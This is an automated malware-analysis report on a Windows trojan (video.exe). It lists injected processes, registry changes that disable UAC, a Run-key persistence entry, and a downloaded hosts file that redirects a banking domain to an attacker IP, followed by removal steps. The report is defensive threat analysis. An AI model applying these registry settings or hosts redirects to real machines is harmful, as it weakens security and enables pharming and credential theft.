MD5: 3059beda9d52aa1d56be4531b121ade7
SHA1: d9f0a5fb8ea61581ecdab896e705cb147907ae2a
SHA256: 725636f8156891c8eb38b1922381630e80cd3e3e0f1520ff97aba10263944a5f
SSDeep: 384:9IolQltVS0lbumJ21Lf4ZGDf00Tu8T0npzkneEi0x7rjSvChkNGC mCzYcHe m:9jlAtVaJS0TqpREp7CvCaNGzzYcHe m
Size: 33280 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2012-01-19 23:18:30
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

mscorsvw.exe:1912

The Trojan injects its code into the following process(es):

%original file name%.exe:1520

File activity

The process %original file name%.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\drivers\ms.doc (1 bytes)
%System%\drivers\winlogon.exe (33 bytes)
%System%\drivers\etc\hosts (1 bytes)

The Trojan deletes the following file(s):

%System%\drivers\ms.doc (0 bytes)

Registry activity

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1320000"

The process %original file name%.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\3059beda9d52aa1d56be4531b121ade7\DEBUG]
"Trace Level" = ""

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"ConsentPromptBehaviorAdmin" = "0"
"ValidateAdminCodeSignatures" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableInstallerDetection" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableUIADesktopToggle" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"FilterAdministratorToken" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B0 6E 9E 83 F4 A7 DE 69 BF BC 4A D5 E1 88 FE DD"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableSecureUIAPaths" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windows Live Messenger" = "C:\Windows\System32\drivers\winlogon.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\3059beda9d52aa1d56be4531b121ade7\DEBUG]
"Trace Level"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 1036 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: Integracion
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2011
Legal Trademarks:
Original Filename: video.exe
Internal Name: video.exe
File Version: 1.0.0.0
File Description: Integracion
Comments:
Language: English (United Kingdom)

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://hotelaziz.com/hotelreservation/install.txt
hxxp://www.hotelaziz.com/hotelreservation/install.txt	192.185.108.190

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /hotelreservation/install.txt HTTP/1.1

Host: VVV.hotelaziz.com

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 24 May 2014 05:52:17 GMT

Content-Type: text/plain

Content-Length: 1036

Connection: keep-alive

Last-Modified: Wed, 18 Jan 2012 19:49:12 GMT

Accept-Ranges: bytes
# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS
 file used by Microsoft TCP/IP for Windows...#..# This file contains t
he mappings of IP addresses to host names. Each..# entry should be kep
t on an individual line. The IP address should..# be placed in the fir
st column followed by the corresponding host name...# The IP address a
nd the host name should be separated by at least one..# space...#..# A
dditionally, comments (such as these) may be inserted on individual..#
 lines or following the machine name denoted by a '#' symbol...#..# Fo
r example:..#..#      102.54.94.97     rhino.acme.com          # sourc
e server..#       38.25.63.10     x.acme.com              # x client h
ost..# localhost name resolution is handled within DNS itself...#.127.
0.0.1       localhost..#.::1             localhost....................
............................................................96.125.162
.84 VVV.viabcp.com..96.125.162.84 viabcp.com..

GET /hotelreservation/install.txt HTTP/1.1

Host: VVV.hotelaziz.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.6.0

Date: Sat, 24 May 2014 05:52:17 GMT

Content-Type: text/plain

Content-Length: 1036

Connection: keep-alive

Last-Modified: Wed, 18 Jan 2012 19:49:12 GMT

Accept-Ranges: bytes
# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS
 file used by Microsoft TCP/IP for Windows...#..# This file contains t
he mappings of IP addresses to host names. Each..# entry should be kep
t on an individual line. The IP address should..# be placed in the fir
st column followed by the corresponding host name...# The IP address a
nd the host name should be separated by at least one..# space...#..# A
dditionally, comments (such as these) may be inserted on individual..#
 lines or following the machine name denoted by a '#' symbol...#..# Fo
r example:..#..#      102.54.94.97     rhino.acme.com          # sourc
e server..#       38.25.63.10     x.acme.com              # x client h
ost..# localhost name resolution is handled within DNS itself...#.127.
0.0.1       localhost..#.::1             localhost....................
............................................................96.125.162
.84 VVV.viabcp.com..96.125.162.84 viabcp.com..

The Trojan connects to the servers at the folowing location(s):

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   mscorsvw.exe:1912
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %System%\drivers\ms.doc (1 bytes)
   %System%\drivers\winlogon.exe (33 bytes)
   %System%\drivers\etc\hosts (1 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   "windows Live Messenger" = "C:\Windows\System32\drivers\winlogon.exe"

5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
   127.0.0.1 localhost
   
6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
7. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.